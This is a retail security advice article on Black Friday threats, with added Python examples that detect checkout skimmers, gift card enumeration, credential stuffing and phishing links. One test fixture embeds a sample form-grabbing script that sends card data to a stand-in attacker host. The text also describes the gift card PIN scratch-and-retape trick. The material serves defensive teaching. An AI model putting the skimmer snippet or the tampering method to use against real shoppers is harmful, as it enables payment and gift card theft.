Retail cybersecurity is always crucial, but it’s officially time for both retailers and customers to prepare for Black Friday. This year, analysts predict online sales on Black Friday alone will hit $7.5 billion, a 20 percent increase over 2018.

Cybercriminals are known to follow the money. The retail industry is a top target for financially motivated attacks year-round, and threat actors view holiday sales as an opportunity to strike it rich. The rate of cyberattacks against retailers spikes every November in the days after Thanksgiving.

Consumers and retailers should prepare for Black Friday security risks with awareness and vigilance. This year’s holiday shopping season is likely to include a mixture of attacks, including familiar threats and emerging techniques.

How to Protect Against 2019 Retail Cybersecurity Threats

There are clear risks associated with a retail cybersecurity incident. Customer trust is a major form of competitive currency for retailers, and the average cost of a data breach reached $3.92 million in 2019, with long-term effects on sales and customer loyalty that are harder to put a number on.

One-fifth of consumers will permanently take their retail business to a different company after a data breach, per KPMG. Thirty-three percent would take a break from shopping with a breached retailer for an extended period of time.

The possible risks of being victimized range in size and impact. A web application attack could cost millions, while a smaller-scale attack on gift cards or loyalty programs could cost thousands in stolen products. However, any loss of customer data may result in damaged trust.

Here are four risks to keep an eye out for this shopping season.

1. Web Application Attacks

Web application attacks represented 63 percent of data breaches in the retail industry over the past year, according to the 2019 Verizon Data Breach Investigations Report (DBIR). That’s a 58 percent increase since 2014. The most common tools in retail web app attacks were malware that captures application data, such as payment-skimming code injected into e-commerce checkout pages, along with spyware and keyloggers.

Across all industries, attacks against web applications are on the rise. Retailers are experiencing significantly fewer POS intrusions and physical skimmer tampering incidents than in years past, per Verizon. Web app attacks are part of a broader shift away from physical card theft, or “card-present” fraud, and toward card-not-present attacks against online checkouts.

The best defenses against skimming code, spyware, keyloggers and other targeted malware are detection and mitigation controls that can identify malicious activity during the surge of Black Friday e-commerce traffic: monitor checkout pages for scripts that were not there at the last release, alert when form data is sent to a third-party host you have never approved, and resist the temptation to loosen a web application firewall just to survive peak load.
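One concrete form of the checkout-page monitoring described above, as an added example that is not code from the original article: a small Python audit that fingerprints the scripts on a page and flags any external script loading from an unapproved host, or any inline script whose hash is not in a known-good baseline. The page HTML, the hostnames and the tampered page are constructed for illustration and are not real retailer data.

```python
"""Detect unauthorized script changes on a checkout page against a baseline.

Added example (not the article's own code). The HTML and hostnames below are
constructed; in practice the baseline is captured at release time and the
audit runs against the live page on a schedule.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collects <script src=...> URLs and the bodies of inline <script> tags."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser hands <script> contents to handle_data as raw text.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def fingerprint(html):
    """Return (set of external script URLs, set of SHA-256 hashes of inline scripts)."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    inline_hashes = {hashlib.sha256(s.encode()).hexdigest() for s in p.inline}
    return set(p.external), inline_hashes


def audit_checkout_page(html, baseline_inline_hashes, allowed_script_hosts):
    """Flag scripts that load from an unapproved host or were not in the baseline."""
    external, inline = fingerprint(html)
    findings = []
    for url in sorted(external):
        host = urlparse(url).hostname or ""
        if host not in allowed_script_hosts:
            findings.append(("unapproved-external-script", url))
    for digest in sorted(inline - baseline_inline_hashes):
        findings.append(("new-inline-script", digest))
    return findings


# Constructed known-good checkout page captured at release time.
KNOWN_GOOD = """<html><body>
<form id="checkout"><input name="card"><input name="cvv"></form>
<script src="https://static.shop.example/checkout.js"></script>
<script>document.getElementById("checkout").dataset.ready = "1";</script>
</body></html>"""

# Constructed tampered copy: an injected loader plus an inline form-grabber
# that posts every field of the checkout form to an attacker-controlled host.
TAMPERED = KNOWN_GOOD.replace("</body>", """
<script src="https://cdn-stats-collect.example/s.js"></script>
<script>document.forms[0].addEventListener("submit", function (e) {
  var d = JSON.stringify(Object.fromEntries(new FormData(e.target)));
  new Image().src = "https://cdn-stats-collect.example/c?d=" + encodeURIComponent(d);
});</script>
</body>""")

ALLOWED_HOSTS = {"static.shop.example"}          # hosts approved to serve scripts
BASELINE_INLINE = fingerprint(KNOWN_GOOD)[1]     # inline script hashes at release

if __name__ == "__main__":
    print("known-good:", audit_checkout_page(KNOWN_GOOD, BASELINE_INLINE, ALLOWED_HOSTS))
    print("tampered:  ", audit_checkout_page(TAMPERED, BASELINE_INLINE, ALLOWED_HOSTS))
```

The baseline approach catches both halves of a typical skimmer injection (a new external loader and a new inline hook) without having to understand what the script does; the trade-off is that every legitimate release must refresh the baseline, which is exactly the discipline that tends to slip during a holiday code freeze.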

2. Gift Card Theft

Consumers have become savvy about the risks and signals of credit card fraud. Most people check financial accounts regularly for signs of suspicious activity. As a result, thieves are now exploiting a different angle for financial gain that’s likely to go unnoticed.

“Who checks their gift card balances on a daily basis?” security principal Rick McElroy said in an interview with CNBC Make It. “Thieves get a lot longer to hide.”

Threat actors are stealing gift card data in multiple ways, including tampering with cards in brick-and-mortar stores to capture card numbers before a purchase. Krebs on Security reported that thieves scratch off the PIN covering on gift cards still hanging on retail racks, record the card number and PIN, and re-cover the scratched area with a widely available tape product so the card looks untouched. Once a victim buys and loads the card, the thief drains the balance before the buyer ever uses it.

There’s also been a surge of gift card attacks that use automated digital methods, including bots that test millions of possible gift card numbers and PINs against retailers’ online balance-check pages to find loaded cards.

Retailers with physical locations should monitor for suspicious activity near card racks or consider putting gift cards behind the counter. Offering customers the opportunity to register cards online and choose a new PIN upon registration can help protect against theft as well. Finally, watch balance-check and redemption endpoints for signs of bot activity, such as a single client querying many distinct card numbers with a high failure rate, and rate-limit those endpoints accordingly.

As a customer, avoid maintaining high balances on gift cards for long periods whenever possible. Register retail gift cards online using a unique username and password, and change your PIN whenever possible. Finally, take a moment to inspect gift cards visually in-store for any signs of physical tampering, or purchase cards online to mitigate the risk.

3. Loyalty Program Exploits

Thirty-six percent of retail data breaches in the past year targeted customers’ personal information or user credentials. Loyalty programs are an increasingly common angle for cybercriminals, and the retail and hospitality industries are key targets. Gaining access to a customer’s retail loyalty account can offer multiple forms of payoff. Once inside, thieves can access loads of personal info, steal loyalty reward points or, if they’re really lucky, access stored credit card data.

As a retailer, it’s important to monitor year-round for signs of loyalty program exploits: many failed sign-ins across many different accounts from one source (the signature of credential stuffing with recycled passwords), logins from unfamiliar locations or devices, and sudden surges of loyalty point redemption on a single account. Adopting stronger password requirements can minimize the risk of customer accounts being compromised due to recycled or easily guessed passwords.
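The bot activity described in the gift card section and the sign-in and redemption monitoring described above share one detection shape: count what a single source does inside a short window. The following Python is an added example, not the article’s own code or any retailer’s real tooling. It parses a constructed access log (the log format, IP addresses, card numbers, account names and thresholds are all made up for illustration) and raises three kinds of alert: gift card enumeration, credential stuffing against loyalty logins, and a redemption surge on one account.

```python
"""Velocity-based detection of gift card enumeration, credential stuffing and
loyalty redemption surges. Added example; log format and data are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. Fields: timestamp, client IP, endpoint, key=value pairs.
SAMPLE_LOG = """\
2019-11-29T08:00:01Z 198.51.100.10 /giftcard/balance card=6006000000001111 outcome=ok
2019-11-29T08:00:02Z 203.0.113.5 /giftcard/balance card=6006000000002000 outcome=invalid
2019-11-29T08:00:02Z 203.0.113.5 /giftcard/balance card=6006000000002001 outcome=invalid
2019-11-29T08:00:02Z 203.0.113.5 /giftcard/balance card=6006000000002002 outcome=invalid
2019-11-29T08:00:03Z 203.0.113.5 /giftcard/balance card=6006000000002003 outcome=invalid
2019-11-29T08:00:03Z 203.0.113.5 /giftcard/balance card=6006000000002004 outcome=invalid
2019-11-29T08:00:03Z 203.0.113.5 /giftcard/balance card=6006000000002005 outcome=ok
2019-11-29T08:01:00Z 203.0.113.9 /loyalty/login account=alice outcome=fail
2019-11-29T08:01:00Z 203.0.113.9 /loyalty/login account=bob outcome=fail
2019-11-29T08:01:01Z 203.0.113.9 /loyalty/login account=carol outcome=ok
2019-11-29T08:01:01Z 203.0.113.9 /loyalty/login account=dave outcome=fail
2019-11-29T08:02:00Z 198.51.100.22 /loyalty/redeem account=carol outcome=ok points=900
2019-11-29T08:02:30Z 198.51.100.22 /loyalty/redeem account=carol outcome=ok points=900
2019-11-29T08:05:00Z 198.51.100.30 /loyalty/login account=erin outcome=fail
2019-11-29T08:05:10Z 198.51.100.30 /loyalty/login account=erin outcome=ok
"""


def parse_line(line):
    """Turn one log line into a dict; key=value pairs become fields."""
    ts, ip, endpoint, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "ip": ip, "endpoint": endpoint, **fields}


def windows(events, window):
    """Yield a sliding window of events starting at each event, sorted by time."""
    events = sorted(events, key=lambda e: e["ts"])
    for i, start in enumerate(events):
        yield [e for e in events[i:] if e["ts"] - start["ts"] <= window]


def detect_abuse(log_text, window=timedelta(minutes=5),
                 max_distinct_cards=5, max_failed_accounts=3, max_points=1000):
    """Return (alert_type, subject, measure) tuples for suspicious activity."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    by_ip, redemptions = defaultdict(list), defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
        if e["endpoint"] == "/loyalty/redeem":
            redemptions[e["account"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        # Gift card enumeration: one client, many distinct cards, mostly misses.
        checks = [e for e in evs if e["endpoint"] == "/giftcard/balance"]
        for w in windows(checks, window):
            tried = {e["card"] for e in w}
            failed = sum(e["outcome"] != "ok" for e in w)
            if len(tried) >= max_distinct_cards and failed >= len(w) // 2:
                alerts.append(("giftcard-enumeration", ip, len(tried)))
                break
        # Credential stuffing: one client, failed logins across many accounts.
        logins = [e for e in evs if e["endpoint"] == "/loyalty/login"]
        for w in windows(logins, window):
            failed_accounts = {e["account"] for e in w if e["outcome"] == "fail"}
            if len(failed_accounts) >= max_failed_accounts:
                alerts.append(("credential-stuffing", ip, len(failed_accounts)))
                break
    # Redemption surge: one account burning more points than expected in a window.
    for account, evs in redemptions.items():
        for w in windows(evs, window):
            total = sum(int(e["points"]) for e in w)
            if total > max_points:
                alerts.append(("redemption-surge", account, total))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_abuse(SAMPLE_LOG):
        print(alert)
```

Note what does not fire: a single customer (erin) who mistypes a password once and then logs in, and a single card balance check from a legitimate shopper. The thresholds are deliberately low for the sample; in production they are tuned per endpoint, and the same counters can be keyed on a device fingerprint or session rather than only the client IP, since bot operators rotate addresses.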

It’s risky business for customers to recycle passwords across multiple loyalty accounts, especially if you store your credit card on file. If you’re guilty of lazy password habits, consider updating your password for online retail accounts.

4. Social Engineering Attacks

The majority of retail cybersecurity events involve external threat actors. Just 19 percent of attacks last year involved inadvertent insider errors. However, retail is especially exposed to social engineering threats, including phishing and vishing attacks, because its large, seasonal and customer-facing workforce is trained to be helpful first and skeptical second.

Cybercriminals are likely to exploit distracted workers during the surge of retail sales in the weeks ahead. Retailers should double-down on training and awareness activity, including efforts to educate seasonal hires.

Similarly, consumers should keep watch for social engineering attacks. The Cybersecurity and Infrastructure Security Agency (CISA) has issued an official warning to consumers about emails that contain malicious attachments or links during the upcoming holiday shopping season. SMS phishing, or smishing, is another form of social engineering attack that will likely be used in the weeks to come.

Remember, cybercriminals exploit distractions and emotions like panic. Remain watchful for emails or text messages that alert you to suspicious account activity or present fake shipping invoices from major retailers. It’s wise to avoid clicking links or opening attachments, especially in text messages, where the sender and the real destination of a link are harder to inspect. If you receive a suspicious account alert, go to the retailer’s site by typing its address yourself, or call its customer service department, rather than following the link you were sent.
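A practical check for the copycat links described above, as an added example that is not from the original article: a Python scanner that pulls URLs out of a message and classifies each host as trusted, a lookalike of a trusted retailer domain, a raw IP address, or unknown. The trusted domain list, the sample messages and the confusable-character table are constructed assumptions for illustration; the registrable-domain logic deliberately ignores the public suffix list, which a production version would need.

```python
"""Classify links in a message as trusted, lookalike, raw-ip or unknown.

Added example; TRUSTED_DOMAINS and the sample messages are constructed.
"""
import re
from urllib.parse import urlparse

# Constructed: the retailer's real domains that a customer would expect links from.
TRUSTED_DOMAINS = {"shop.example", "example-delivery.com"}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")

# Digits and letter pairs that read like other letters in a phone-screen font.
_CONFUSABLE_CHARS = str.maketrans("01357", "olest")
_CONFUSABLE_PAIRS = (("rn", "m"), ("vv", "w"))


def normalize(host):
    """Fold common confusables so that sh0p.example compares equal to shop.example."""
    host = host.translate(_CONFUSABLE_CHARS)
    for pair, letter in _CONFUSABLE_PAIRS:
        host = host.replace(pair, letter)
    return host


def classify_host(host, trusted=TRUSTED_DOMAINS):
    host = host.lower().rstrip(".")
    if IPV4_RE.fullmatch(host):
        return "raw-ip"
    # Exact trusted domain or a genuine subdomain of one.
    for d in trusted:
        if host == d or host.endswith("." + d):
            return "trusted"
    # Trusted name used as a decoy: shop.example.account-verify.net, shop-example-login.net
    flat = host.replace("-", ".")
    for d in trusted:
        dd = d.replace("-", ".")
        if flat.startswith(dd + ".") or ("." + dd + ".") in flat:
            return "lookalike"
    # Confusable substitution: sh0p.example, exarnple-delivery.com
    folded = normalize(host)
    for d in trusted:
        if folded == d or folded.endswith("." + d):
            return "lookalike"
    return "unknown"


def scan_message(text):
    """Return [(url, verdict)] for every http(s) link found in the message."""
    results = []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;:!?)")
        host = urlparse(url).hostname or ""
        results.append((url, classify_host(host)))
    return results


# Constructed sample messages in the style of holiday-season lures.
SAMPLE_MESSAGES = [
    "Your order has shipped. Track it: https://shop.example/track/123",
    "Account locked! Verify now at http://shop.example.account-verify.net/login",
    "Package held at depot, pay fee: https://sh0p.example/pay",
    "Invoice attached: http://203.0.113.5/invoice.pdf",
    "Weekend reading: https://news.other.example/story",
]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        for url, verdict in scan_message(msg):
            print(f"{verdict:10} {url}")
```

The order of the checks matters: the trusted match must run before the lookalike heuristics, or every genuine subdomain such as track.shop.example would be flagged. The confusable table is a starting point, not a complete homoglyph list, and an "unknown" verdict is not a clean bill of health; it only means the link does not impersonate a domain on the list.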

Retail Cybersecurity Risks Will Spike on Black Friday and Cyber Monday

Retailers and customers can comfortably predict that they’ll be targeted on Black Friday and Cyber Monday. The single most important means of protection is vigilance. Don’t allow yourself to get so mixed up in the rush of rock-bottom prices that you forget to exercise secure behaviors or monitor for suspicious activity. Black Friday security threats tend to exploit distracted retail employees especially.

Consumers need to watch out for copycat emails and text messages to avoid being hooked by social engineering attacks. While it’s not possible or practical to monitor all of your gift card balances and loyalty accounts, be aware that maintaining high balances on gift cards can put you in the crosshairs. Fortunately, strong password practices can mitigate many of the risks tied to account compromise and loyalty point theft.
